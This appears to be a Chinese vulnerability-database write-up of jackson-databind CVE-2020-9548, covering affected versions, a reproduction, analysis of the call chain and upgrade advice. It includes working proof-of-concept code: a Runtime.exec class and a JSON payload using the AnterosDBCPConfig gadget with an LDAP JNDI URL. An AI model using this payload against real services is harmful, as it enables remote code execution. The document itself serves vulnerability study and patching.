—
title: ‘jackson-databind RCE CVE-2020-9548’
date: Fri, 04 Sep 2020 03:20:36 +0000
draft: false
tags: [‘白阁-漏洞库’]
—
### 影响范围
• jackson-databind before 2.9.10.4 • jackson-databind before 2.8.11.6 • jackson-databind before 2.7.9.7
### 漏洞类型
JDNI注入导致RCE 利用条件 • 开启enableDefaultTyping() • 使用了br.com.anteros.dbcp.AnterosDBCPConfig第三方依赖
### 漏洞概述
2020年3月,jackson-databind在github上更新了一个新的反序列化利用类br.com.anteros.dbcp.AnterosDBCPConfig,该类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成RCE。
### 漏洞复现
环境搭建 pom.xml:
“`
“`
### 漏洞利用
编译Exploit.java Exploit.java代码如下:
“`
import java.lang.Runtime;
public class Exploit {
static {
try {
Runtime.getRuntime().exec(“calc”);
} catch (Exception e) {
e.printStackTrace();
}
}
}
“`
搭建HTTP服务 使用Python搭建简易SimpleHTTPServer服务:
搭建LDAP服务 使用marshalsec来启动一个LDAP服务:
执行漏洞POC1 Poc.java代码如下所示:
“`
package com.jacksonTest;
import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;
public class Poc {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
String payload = “[\”br.com.anteros.dbcp.AnterosDBCPConfig\”, {\”metricRegistry\”:\”ldap://127.0.0.1:1099/Exploit\”}]”;
try {
mapper.readValue(payload, Object.class);
} catch (IOException e) {
e.printStackTrace();
}
}
}
“`
之后运行该程序,成功执行命令,弹出计算器:
### 漏洞分析
首先定位到br.com.anteros.dbcp.AnterosDBCPConfig类,之后发现一处可疑的JNDI注入:
由于参数来自object,所以之后全局搜索调用getObjectOrPerformJndiLookup函数调用的地方发现setMetricRegistry处有一处可控的调用,此处的参数metricRegistry可有json指定,之后传入getObjectOrPerformJndiLookup,之后再次传入lookup,从而导致JNDI注入的发生,并最终导致RCE:
整个利用链如下所示:
“`
mapper.readValue
->setMetricRegistry
->getObjectOrPerformJndiLookup
->lookup
“`
### 修复建议
• 及时将jackson-databind升级到安全版本 • 升级到较高版本的JDK。 参考链接 [https://github.com/FasterXML/jackson-databind/issues/2634](/static/baige/06-中间件框架漏洞/Jackson/https://github.com/FasterXML/jackson-databind/issues/2634)
请登录后查看评论内容